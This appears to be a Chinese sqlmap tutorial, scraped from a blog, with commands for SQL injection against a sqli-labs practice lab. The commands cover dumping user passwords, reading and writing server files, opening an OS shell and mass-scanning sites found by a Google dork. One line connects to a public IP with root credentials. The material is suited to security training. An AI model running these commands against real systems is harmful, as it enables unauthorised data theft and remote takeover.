SQLMAP

有windows和linux两个版本使用,可跨系统进行操作,语法参数都相同,此处以kali linux为例进行操作

sqlmap --version
查看sqlmap版本
sqlmap -h
查看sqlmap帮助
sqlmap -hh
查看sqlmap高级帮助



使用sqlmap连接数据库
查看数据库banner信息
sqlmap -d "mysql://root:123456@47.208.229.216:3306/tiantianbao" -f --banner
查看数据库用户
sqlmap -d "mysql://root:123456@47.208.229.216:3306/tiantianbao" -f --banner --users



针对URL进行探测,使用-u或者-url参数
查看目标url连接数据库的banner信息
sqlmap -u "192.168.137.129/sqli-labs/Less-1/index.php/?id=1" --banner


sqlmap读取文件内目标
Sqlmap支持从不同类型的文件中读取目标进行Sql注入探测
1、-l从Burpsuite proxy或WebScarab proxy中读取Http 请求日志文件
sqlmap -l test(bp导出文件)
2、-x 从sitemap.xml站点地图文件中读取目标探测。
3、-m从多行文本格式文件读取多个目标,对多个目标进行探测。
sqlmap -m test.txt(自写的url)
4、-r从文本文件中读取Http请求作为Sql注入探测的目标。
sqlmap -r test.txt(bp导出请求的数据文件)
5、-C从配置文件sqlmap.conf中读取目标探测。

sqlmap google批量扫描注入
利用google hack语法进行扫描
sqlmap -g "inurl:\.php?id=1\""

sqlmap设置http请求方法
强制指定
--method=get
设置post提交参数
sqlmap -u '192.168.137.129/sqli-labs/Less-11/index.php' --data="uname=admin&passwd=admin&submit=Submit" -f --banner --dbs --users -f --fingerprint


sqlmap设置参数分隔符
get     ;
post    &

sqlmap设置cookie头
--cookie
--cookie-del
--load-cookies
--drop-sel-cookie
用于Web应用程序具有基于cookie的验证过程
利用cookie注入的漏洞

1.GET参数注入sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"2.POST参数注入sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1"  --data="id=1"3.cookie注入 (level>=2时才会检测cookie)  sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 24.user-agent注入sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 35.referer注入sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 36.host注入sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 5

获取数据库信息1.查看数据库sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --dbs  --batch2.查看数据库里面的表sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --D security --tables --batch3.查看数据库表里面的列sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --D security --T users --columns   --batch4.查看数据库列里面的具体的值sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --D security --T users -C password     --dump  --batch

暴力破解使用条件:1.MySQL数据库版本小于5.0,没有information——schema表。2.Microssoft Access数据库。3.当前用户没有权限读取系统中保存的数据。*暴力破解中破解表名的文件位于common-tables.txt 中,同理破解列名的文件位于common-columns.txt 中1.暴力破解表名sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"  -D security --common-tables --batch2.暴力破解列名sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"  -D security -Tusers --common-columns --batch读取文件/上传文件
1.读取文件sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"   --file-read "C:/post.txt"2写入文件sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"   --file-write "/root/1.txt"--file-dest "C:/phpstudy/PHPTutorial/www/1.txt"获取shellsqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"  --os-shell

kali linux下sqlmap使用教程相关推荐

  1. linux下sqlmap安装教程,(转)Sqlmap官网下载与安装教程[windows/linux版本]

    转自:http://www.vuln.cn/2000 sqlmap的功能与强大性不必多言,方便大家下载,给大家整理了下sqlmap最新版的官网与github下载地址. 官网下载地址 github下载 ...

  2. kali linux nmap使用教程,kali linux下nmap的使用方法介绍

    知道kali 是什么吗,那么linux下nmap的使用方法是怎么回事呢,下面是学习啦小编跟大家分享的是kali linux下nmap的使用方法介绍,欢迎大家来阅读学习. kali linux下nmap ...

  3. kali Linux下wifi密码安全测试(1)虚拟机下usb无线网卡的挂载 【转】

    转自:http://blog.chinaunix.net/uid-26349264-id-4455634.html 目录 kali Linux下wifi密码安全测试(1)虚拟机下usb无线网卡的挂载 ...

  4. kali linux查询自己的ip,Kali Linux常用服务配置教程获取IP地址

    Kali Linux常用服务配置教程获取IP地址 下面以Kali Linux为例,演示获取IP地址的方法 (1)设置网络接口为自动获取IP地址.在Kali Linux的收藏夹中单击图标,将显示所有的程 ...

  5. Kali Linux 2020.1安装教程

    Kali Linux 2020 新版安装教程[炒鸡详细] 引言 自己记录一下安装过程,避免以后每次都要上网搜安装教程,看自己的更方便一点 马上新学期了,学弟们也可以用得到 准备工具 VMware 15 ...

  6. linux pm,Kali Linux下配置PM3运行环境

    0x00 前言 作为一个学生党,在今年的早些时候入手了Proxmark3rdv4,一下子花了不少还是有点小心疼,先上Freebuf来看了下相关的资料发现还是有点少,尤其是关于环境配置方面,虽然官方的w ...

  7. kali linux 装u盘安装教程,kali linux系统的安装教程(实现便于携带的外置盘系统)...

    kali linux系统的安装教程(实现便于携带的外置盘系统) kali linux系统的安装教程 我最开始想通过虚拟机安装在硬盘上,实现双系统.后来希望通过将系统安装在移动硬盘上,实现可随身携带的特 ...

  8. kali Linux下wifi密码安全测试(1)虚拟机下usb无线网卡的挂载_商洛学院司徒荆_新浪博客

    kali Linux下wifi密码安全测试(1)虚拟机下usb无线网卡的挂载 1.1     VMWare下的配置 1.2 VirtualBox下的配置 原文链接:http://www.xuanhun ...

  9. 第四篇 kali Linux 下安装fluxion

    第四篇 kali Linux 下安装fluxion 第一篇kali linux 安装 https://blog.csdn.net/qq_43632394/article/details/1091212 ...

  10. Kali Linux常用服务配置教程获取IP地址

    Kali Linux常用服务配置教程获取IP地址 下面以Kali Linux为例,演示获取IP地址的方法 (1)设置网络接口为自动获取IP地址.在Kali Linux的收藏夹中单击图标,将显示所有的程 ...

最新文章

  1. android 更新 18个月,MIUI迎接史上最大更新:18个月内绝不卡顿,友商羡慕!
  2. 在Git存储库中查找并恢复已删除的文件
  3. ansible安装配置及实例
  4. CSS垂直居中网页布局实现的5种方法
  5. 求n的阶乘的算法框图_单片机常用的14个C语言算法
  6. code craft_以Craft.io为先—关于我们行业的实践职业道路的系列
  7. 致所有.Net者和有梦想的朋友们 - 共勉
  8. android根据mac地址连接耳机,Android获取设备IMEI和Mac地址
  9. javascript 西瓜一期 12 八进制的数数进位解析
  10. HTTP 错误 404.2 – Not Found
  11. MySQL prompt提示符总结
  12. php 根据ip判断是否中国,PHP判断IP是中国IP还是外国IP
  13. 对象和map的相互转换
  14. 微软商店的iTunes备份文件路径正确修改方法(2022.3.25)
  15. 《土豆荣耀》重构笔记(五)创建角色以及怪物的动画
  16. 笔顺、拼音查询小工具推介
  17. 二手前端入门React项目
  18. THOMSON TG789vn 汤姆逊 tg789vn路由器配置
  19. 源码推荐:目前为止最为接近iBook的翻页效果
  20. 【2022 小目标检测综述】Towards Large-Scale Small Object Detection: Survey and Benchmarks

热门文章

  1. 11.sql条件查询
  2. Java中的Filter过滤器
  3. unity, 判断可见性
  4. 注册表清除桌面垃圾图标
  5. GetRows的用法详解
  6. spring中如何实现参数隐式传递_Java进阶架构之开源框架面试题系列:Spring+SpringMVC+MyBatis(含答案分享)...
  7. Ubuntu 挂载windows硬盘突然变成只读了???
  8. HBuilder X 报 Error: Unbalanced delimiter found in string 错误
  9. 自动测试-按键精灵使用
  10. 餐饮后厨计算机应用,美萍餐饮管理系统,餐饮管理软件,餐饮软件,酒店收银系统,饭店点菜系统 --- 管理软件 美萍是专家!...